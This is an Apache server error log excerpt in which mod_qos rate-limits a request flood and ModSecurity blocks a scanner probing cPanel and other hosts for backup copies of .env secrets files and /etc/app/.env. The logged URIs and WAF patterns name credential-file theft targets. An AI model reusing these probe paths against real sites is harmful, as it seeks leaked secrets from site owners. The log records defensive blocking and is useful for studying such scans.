[Tue May 26 19:54:36.599057 2026] [qos:error] [pid 86490:tid 86710] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LBzAAAAN8
[Tue May 26 19:54:36.599363 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtJGDRMqfxdEDkoszR3wAAAEE
[Tue May 26 19:54:36.600532 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtJFZMwN0DpLVWo6LBywAAAPg
[Tue May 26 19:54:36.601296 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJGDRMqfxdEDkoszR4QAAABE
[Tue May 26 19:54:36.604065 2026] [qos:error] [pid 86490:tid 86725] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB0AAAAO4
[Tue May 26 19:54:36.605493 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtJFZMwN0DpLVWo6LB0QAAALs
[Tue May 26 19:54:36.611468 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB0gAAAQI
[Tue May 26 19:54:36.613461 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB0wAAAPw
[Tue May 26 19:54:36.668029 2026] [security2:error] [pid 86490:tid 86708] [client 142.248.80.176:25726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.swp"] [unique_id "ahWtJFZMwN0DpLVWo6LB1wAAAN0"]
[Tue May 26 19:54:36.670828 2026] [proxy:error] [pid 93868:tid 94362] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.670891 2026] [proxy_http:error] [pid 93868:tid 94362] [client 142.248.80.176:25710] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.671200 2026] [security2:error] [pid 93576:tid 93834] [client 142.248.80.176:25728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.orig"] [unique_id "ahWtJGDRMqfxdEDkoszR4gAAAHo"]
[Tue May 26 19:54:36.671459 2026] [proxy:error] [pid 93868:tid 94362] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.671493 2026] [proxy_http:error] [pid 93868:tid 94362] [client 142.248.80.176:25710] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.678909 2026] [security2:error] [pid 86490:tid 86713] [client 142.248.80.176:25712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production~"] [unique_id "ahWtJFZMwN0DpLVWo6LB2AAAAOI"]
[Tue May 26 19:54:36.679084 2026] [security2:error] [pid 93576:tid 93832] [client 142.248.80.176:25640] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.swp"] [unique_id "ahWtJGDRMqfxdEDkoszR5AAAAHg"]
[Tue May 26 19:54:36.679460 2026] [security2:error] [pid 93576:tid 93756] [client 142.248.80.176:25654] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.orig"] [unique_id "ahWtJGDRMqfxdEDkoszR4wAAACw"]
[Tue May 26 19:54:36.680842 2026] [security2:error] [pid 93868:tid 94277] [client 142.248.80.176:25676] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.bak"] [unique_id "ahWtJEqK9k_ZUB2Vp25KGwAAAaI"]
[Tue May 26 19:54:36.680958 2026] [security2:error] [pid 86490:tid 86682] [client 142.248.80.176:25588] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.copy"] [unique_id "ahWtJFZMwN0DpLVWo6LB3QAAAMM"]
[Tue May 26 19:54:36.680977 2026] [security2:error] [pid 86490:tid 86691] [client 142.248.80.176:25612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.backup"] [unique_id "ahWtJFZMwN0DpLVWo6LB2QAAAMw"]
[Tue May 26 19:54:36.681283 2026] [security2:error] [pid 93576:tid 93747] [client 142.248.80.176:25700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.backup"] [unique_id "ahWtJGDRMqfxdEDkoszR5QAAACM"]
[Tue May 26 19:54:36.681351 2026] [security2:error] [pid 86490:tid 86675] [client 142.248.80.176:25600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.old"] [unique_id "ahWtJFZMwN0DpLVWo6LB2wAAALw"]
[Tue May 26 19:54:36.681697 2026] [security2:error] [pid 86490:tid 86700] [client 142.248.80.176:25594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.bak"] [unique_id "ahWtJFZMwN0DpLVWo6LB3AAAANU"]
[Tue May 26 19:54:36.681720 2026] [security2:error] [pid 86490:tid 86625] [client 142.248.80.176:25574] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.orig"] [unique_id "ahWtJFZMwN0DpLVWo6LB3gAAAIo"]
[Tue May 26 19:54:36.681754 2026] [proxy:error] [pid 93868:tid 94375] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.681798 2026] [proxy_http:error] [pid 93868:tid 94375] [client 142.248.80.176:25614] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.681849 2026] [security2:error] [pid 86490:tid 86657] [client 142.248.80.176:25568] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.swp"] [unique_id "ahWtJFZMwN0DpLVWo6LB3wAAAKo"]
[Tue May 26 19:54:36.681874 2026] [security2:error] [pid 93576:tid 93813] [client 142.248.80.176:25686] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.old"] [unique_id "ahWtJGDRMqfxdEDkoszR5wAAAGU"]
[Tue May 26 19:54:36.682000 2026] [security2:error] [pid 93576:tid 93809] [client 142.248.80.176:25662] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.copy"] [unique_id "ahWtJGDRMqfxdEDkoszR5gAAAGE"]
[Tue May 26 19:54:36.682367 2026] [proxy:error] [pid 93868:tid 94375] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.682424 2026] [proxy_http:error] [pid 93868:tid 94375] [client 142.248.80.176:25614] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.682438 2026] [security2:error] [pid 86490:tid 86660] [client 142.248.80.176:25564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env~"] [unique_id "ahWtJFZMwN0DpLVWo6LB4AAAAK0"]
[Tue May 26 19:54:36.682919 2026] [security2:error] [pid 86490:tid 86654] [client 142.248.80.176:25624] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local~"] [unique_id "ahWtJFZMwN0DpLVWo6LB2gAAAKc"]
[Tue May 26 19:54:36.753543 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB5QAAALI
[Tue May 26 19:54:36.754298 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJGDRMqfxdEDkoszR6AAAAHY
[Tue May 26 19:54:36.754777 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB5gAAAPs
[Tue May 26 19:54:36.755060 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB5AAAAL4
[Tue May 26 19:54:36.755553 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJGDRMqfxdEDkoszR6QAAAEw
[Tue May 26 19:54:36.762981 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB6QAAAKA
[Tue May 26 19:54:36.762984 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB6AAAAI0
[Tue May 26 19:54:36.768426 2026] [qos:error] [pid 86490:tid 86725] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB6gAAAO4
[Tue May 26 19:54:36.772933 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB6wAAALs
[Tue May 26 19:54:36.776577 2026] [security2:error] [pid 86490:tid 86681] [client 142.248.80.176:25540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.bak"] [unique_id "ahWtJFZMwN0DpLVWo6LB7AAAAMI"]
[Tue May 26 19:54:36.776905 2026] [proxy:error] [pid 93868:tid 94320] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.776973 2026] [proxy_http:error] [pid 93868:tid 94320] [client 142.248.80.176:25558] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.777372 2026] [security2:error] [pid 93868:tid 94318] [client 142.248.80.176:25268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.backup"] [unique_id "ahWtJEqK9k_ZUB2Vp25KHwAAAcs"]
[Tue May 26 19:54:36.777388 2026] [security2:error] [pid 93576:tid 93833] [client 142.248.80.176:25542] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.old"] [unique_id "ahWtJGDRMqfxdEDkoszR6gAAAHk"]
[Tue May 26 19:54:36.777549 2026] [proxy:error] [pid 93868:tid 94320] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.777581 2026] [proxy_http:error] [pid 93868:tid 94320] [client 142.248.80.176:25558] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.777723 2026] [proxy:error] [pid 93868:tid 94341] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.777782 2026] [proxy_http:error] [pid 93868:tid 94341] [client 142.248.80.176:25490] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.778043 2026] [proxy:error] [pid 93576:tid 93713] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.778085 2026] [proxy_http:error] [pid 93576:tid 93713] [client 142.248.80.176:25504] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.778376 2026] [proxy:error] [pid 93868:tid 94341] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.778419 2026] [proxy_http:error] [pid 93868:tid 94341] [client 142.248.80.176:25490] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.778662 2026] [proxy:error] [pid 93576:tid 93713] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.778695 2026] [proxy_http:error] [pid 93576:tid 93713] [client 142.248.80.176:25504] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.778852 2026] [proxy:error] [pid 93868:tid 94281] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.778919 2026] [proxy_http:error] [pid 93868:tid 94281] [client 142.248.80.176:25510] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.779497 2026] [proxy:error] [pid 93868:tid 94281] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.779528 2026] [proxy_http:error] [pid 93868:tid 94281] [client 142.248.80.176:25510] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.779609 2026] [proxy:error] [pid 86490:tid 86686] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.779666 2026] [proxy_http:error] [pid 86490:tid 86686] [client 142.248.80.176:25524] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.780224 2026] [proxy:error] [pid 86490:tid 86686] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.780257 2026] [proxy_http:error] [pid 86490:tid 86686] [client 142.248.80.176:25524] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.902530 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJGDRMqfxdEDkoszR7AAAAEk
[Tue May 26 19:54:36.903576 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB9QAAAK0
[Tue May 26 19:54:36.905812 2026] [qos:error] [pid 93576:tid 93721] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJGDRMqfxdEDkoszR7QAAAAk
[Tue May 26 19:54:36.908619 2026] [qos:error] [pid 86490:tid 86654] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB9gAAAKc
[Tue May 26 19:54:36.909476 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB9wAAAOw
[Tue May 26 19:54:36.917454 2026] [qos:error] [pid 86490:tid 86710] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB-AAAAN8
[Tue May 26 19:54:36.917614 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB-QAAAPk
[Tue May 26 19:54:36.923346 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB-gAAAJw
[Tue May 26 19:54:36.928938 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB-wAAAKg
[Tue May 26 19:54:36.943413 2026] [qos:error] [pid 86490:tid 86688] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LB_AAAAMk
[Tue May 26 19:54:37.051969 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJWDRMqfxdEDkoszR7gAAABM
[Tue May 26 19:54:37.053432 2026] [qos:error] [pid 86490:tid 86637] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LB_QAAAJY
[Tue May 26 19:54:37.055162 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJWDRMqfxdEDkoszR7wAAAAM
[Tue May 26 19:54:37.061715 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LB_wAAAJ0
[Tue May 26 19:54:37.061894 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCAAAAALI
[Tue May 26 19:54:37.075959 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCAQAAAPs
[Tue May 26 19:54:37.077753 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCAgAAAL4
[Tue May 26 19:54:37.082573 2026] [qos:error] [pid 86490:tid 86741] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCAwAAAP4
[Tue May 26 19:54:37.082603 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCBAAAAI0
[Tue May 26 19:54:37.093273 2026] [qos:error] [pid 86490:tid 86725] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCBQAAAO4
[Tue May 26 19:54:37.200641 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJWDRMqfxdEDkoszR8AAAAFA
[Tue May 26 19:54:37.204991 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCBgAAAMI
[Tue May 26 19:54:37.214029 2026] [qos:error] [pid 86490:tid 86713] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCBwAAAOI
[Tue May 26 19:54:37.220243 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCCAAAANU
[Tue May 26 19:54:37.224177 2026] [security2:error] [pid 86490:tid 86627] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/etc/app/.env"] [unique_id "ahWtJVZMwN0DpLVWo6LCCQAAAIw"]
[Tue May 26 19:54:37.237790 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCCgAAALE
[Tue May 26 19:54:37.241678 2026] [qos:error] [pid 86490:tid 86657] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCCwAAAKo
